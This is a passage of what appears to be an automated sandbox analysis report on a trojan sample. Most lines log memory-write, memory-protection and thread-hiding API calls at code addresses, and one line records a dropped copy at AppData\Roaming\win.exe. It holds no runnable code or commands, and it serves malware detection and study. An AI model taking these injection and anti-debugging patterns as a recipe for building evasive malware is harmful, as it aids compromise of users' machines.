Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B45E4 NtWriteVirtualMemory,	18_2_020B45E4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B45F9 NtWriteVirtualMemory,	18_2_020B45F9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B49F4 NtWriteVirtualMemory,	18_2_020B49F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00569417 NtProtectVirtualMemory,	22_2_00569417
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005698CB LoadLibraryA,NtSetInformationThread,	22_2_005698CB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00565CB3 NtAllocateVirtualMemory,	22_2_00565CB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00560CBA D3DKMTSetStablePowerState,NtProtectVirtualMemory,	22_2_00560CBA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00569C14 NtSetInformationThread,	22_2_00569C14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005698D8 NtSetInformationThread,	22_2_005698D8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00565CD9 NtAllocateVirtualMemory,	22_2_00565CD9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005698F3 NtSetInformationThread,	22_2_005698F3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00565CE4 NtAllocateVirtualMemory,	22_2_00565CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00569951 NtSetInformationThread,	22_2_00569951
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_0056995D NtSetInformationThread,	22_2_0056995D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00565D71 NtAllocateVirtualMemory,	22_2_00565D71
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_0056996E NtSetInformationThread,	22_2_0056996E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00569933 NtSetInformationThread,	22_2_00569933
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00565D21 NtAllocateVirtualMemory,	22_2_00565D21
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00565DE9 NtAllocateVirtualMemory,	22_2_00565DE9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005699E9 NtSetInformationThread,	22_2_005699E9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00565D90 NtAllocateVirtualMemory,	22_2_00565D90
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_0056999B NtSetInformationThread,	22_2_0056999B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00565DAD NtAllocateVirtualMemory,	22_2_00565DAD
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00569A57 NtSetInformationThread,	22_2_00569A57
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00565E47 NtAllocateVirtualMemory,	22_2_00565E47
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00569A41 NtSetInformationThread,	22_2_00569A41
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00569A74 NtSetInformationThread,	22_2_00569A74
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_0056166C NtProtectVirtualMemory,	22_2_0056166C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00561614 NtProtectVirtualMemory,	22_2_00561614
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_0056161B NtProtectVirtualMemory,	22_2_0056161B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00569A03 NtSetInformationThread,	22_2_00569A03
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00569A2F NtSetInformationThread,	22_2_00569A2F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005616DF NtProtectVirtualMemory,	22_2_005616DF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00569AEC NtSetInformationThread,	22_2_00569AEC
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00569A95 NtSetInformationThread,	22_2_00569A95
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00569AAF NtSetInformationThread,	22_2_00569AAF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00565EA8 NtAllocateVirtualMemory,	22_2_00565EA8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00569B4B NtSetInformationThread,	22_2_00569B4B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_0056173C NtProtectVirtualMemory,	22_2_0056173C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005693CD NtProtectVirtualMemory,	22_2_005693CD
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00569BCB NtSetInformationThread,	22_2_00569BCB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00569B83 NtSetInformationThread,	22_2_00569B83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005617B0 NtProtectVirtualMemory,	22_2_005617B0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00569417 NtProtectVirtualMemory,	24_2_00569417
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00565CB3 NtAllocateVirtualMemory,	24_2_00565CB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00560CBA D3DKMTSetStablePowerState,NtProtectVirtualMemory,	24_2_00560CBA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00565CD9 NtAllocateVirtualMemory,	24_2_00565CD9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00565CE4 NtAllocateVirtualMemory,	24_2_00565CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00565D71 NtAllocateVirtualMemory,	24_2_00565D71
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00565D21 NtAllocateVirtualMemory,	24_2_00565D21
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00565DE9 NtAllocateVirtualMemory,	24_2_00565DE9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00565D90 NtAllocateVirtualMemory,	24_2_00565D90
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00565DAD NtAllocateVirtualMemory,	24_2_00565DAD
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00565E47 NtAllocateVirtualMemory,	24_2_00565E47
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_0056166C NtProtectVirtualMemory,	24_2_0056166C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00561614 NtProtectVirtualMemory,	24_2_00561614
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_0056161B NtProtectVirtualMemory,	24_2_0056161B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005616DF NtProtectVirtualMemory,	24_2_005616DF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00565EA8 NtAllocateVirtualMemory,	24_2_00565EA8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_0056173C NtProtectVirtualMemory,	24_2_0056173C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005693CD NtProtectVirtualMemory,	24_2_005693CD
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005617B0 NtProtectVirtualMemory,	24_2_005617B0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

File created: C:\Windows\Lwo7

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_0040DD8B	0_2_0040DD8B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B623F	0_2_020B623F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0816	0_2_020B0816
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0CBA	0_2_020B0CBA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5CB3	0_2_020B5CB3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B98CB	0_2_020B98CB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1D2E	0_2_020B1D2E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1204	0_2_020B1204
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4A27	0_2_020B4A27
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4638	0_2_020B4638
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3E30	0_2_020B3E30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0A37	0_2_020B0A37
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4E36	0_2_020B4E36
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8E4B	0_2_020B8E4B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0E4D	0_2_020B0E4D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3244	0_2_020B3244
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B6253	0_2_020B6253
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1265	0_2_020B1265
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B7E78	0_2_020B7E78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4A73	0_2_020B4A73
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3275	0_2_020B3275
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0A88	0_2_020B0A88
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8E8C	0_2_020B8E8C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0E80	0_2_020B0E80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4A87	0_2_020B4A87
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4E99	0_2_020B4E99
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4694	0_2_020B4694
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4AA0	0_2_020B4AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B62A4	0_2_020B62A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0EB3	0_2_020B0EB3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B12DC	0_2_020B12DC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B46D3	0_2_020B46D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8ED0	0_2_020B8ED0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1ED7	0_2_020B1ED7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B630B	0_2_020B630B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2B01	0_2_020B2B01
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4300	0_2_020B4300
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4B00	0_2_020B4B00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1313	0_2_020B1313
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4F14	0_2_020B4F14
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0F2F	0_2_020B0F2F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4B2D	0_2_020B4B2D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4B25	0_2_020B4B25
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2F3E	0_2_020B2F3E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1F3C	0_2_020B1F3C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2B37	0_2_020B2B37
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4B5C	0_2_020B4B5C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1F52	0_2_020B1F52
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2F50	0_2_020B2F50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B136B	0_2_020B136B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3B6F	0_2_020B3B6F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B6363	0_2_020B6363
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3B60	0_2_020B3B60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1F7F	0_2_020B1F7F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4F8C	0_2_020B4F8C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2B83	0_2_020B2B83
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0F9B	0_2_020B0F9B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4797	0_2_020B4797
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2FA8	0_2_020B2FA8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3BAF	0_2_020B3BAF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B63AC	0_2_020B63AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4FB8	0_2_020B4FB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8BBE	0_2_020B8BBE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4BB0	0_2_020B4BB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2BD8	0_2_020B2BD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0FEB	0_2_020B0FEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B47F4	0_2_020B47F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3C0C	0_2_020B3C0C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B641B	0_2_020B641B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4C16	0_2_020B4C16
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0C25	0_2_020B0C25
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3C3F	0_2_020B3C3F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2C33	0_2_020B2C33
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B104C	0_2_020B104C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4847	0_2_020B4847
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8C44	0_2_020B8C44
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0C5B	0_2_020B0C5B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4C68	0_2_020B4C68
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8C6D	0_2_020B8C6D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3063	0_2_020B3063
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B247D	0_2_020B247D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B6480	0_2_020B6480
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4899	0_2_020B4899
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2C94	0_2_020B2C94
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1094	0_2_020B1094
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0CA6	0_2_020B0CA6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B10CB	0_2_020B10CB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B44CF	0_2_020B44CF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0CC1	0_2_020B0CC1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B44C0	0_2_020B44C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B30C4	0_2_020B30C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B64DB	0_2_020B64DB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8CDA	0_2_020B8CDA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2CD9	0_2_020B2CD9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5CD9	0_2_020B5CD9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B98D8	0_2_020B98D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B48E3	0_2_020B48E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4CE4	0_2_020B4CE4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5CE4	0_2_020B5CE4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B60FA	0_2_020B60FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B28FE	0_2_020B28FE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0CF3	0_2_020B0CF3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B98F3	0_2_020B98F3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3114	0_2_020B3114
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8D14	0_2_020B8D14
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4D2A	0_2_020B4D2A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5D21	0_2_020B5D21
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1120	0_2_020B1120
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4520	0_2_020B4520
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B093E	0_2_020B093E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2D30	0_2_020B2D30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4948	0_2_020B4948
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8547	0_2_020B8547
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B095B	0_2_020B095B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8D5C	0_2_020B8D5C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B9951	0_2_020B9951
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B116C	0_2_020B116C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B317B	0_2_020B317B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8D7E	0_2_020B8D7E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B5D71	0_2_020B5D71
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4570	0_2_020B4570
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2D88	0_2_020B2D88
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4D83	0_2_020B4D83
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4985	0_2_020B4985
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0D91	0_2_020B0D91
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B41A7	0_2_020B41A7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B45B5	0_2_020B45B5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8DC3	0_2_020B8DC3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4DE9	0_2_020B4DE9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0DEF	0_2_020B0DEF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B45E0	0_2_020B45E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B45E4	0_2_020B45E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B45F9	0_2_020B45F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8DFF	0_2_020B8DFF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B09FD	0_2_020B09FD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B31F4	0_2_020B31F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B49F4	0_2_020B49F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B623F	16_2_020B623F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0816	16_2_020B0816
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0CBA	16_2_020B0CBA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B5CB3	16_2_020B5CB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B98CB	16_2_020B98CB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1D2E	16_2_020B1D2E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1204	16_2_020B1204
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4A27	16_2_020B4A27
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4638	16_2_020B4638
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3E30	16_2_020B3E30
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0A37	16_2_020B0A37
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4E36	16_2_020B4E36
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8E4B	16_2_020B8E4B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0E4D	16_2_020B0E4D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3244	16_2_020B3244
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B6253	16_2_020B6253
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1265	16_2_020B1265
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B7E78	16_2_020B7E78
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4A73	16_2_020B4A73
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3275	16_2_020B3275
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0A88	16_2_020B0A88
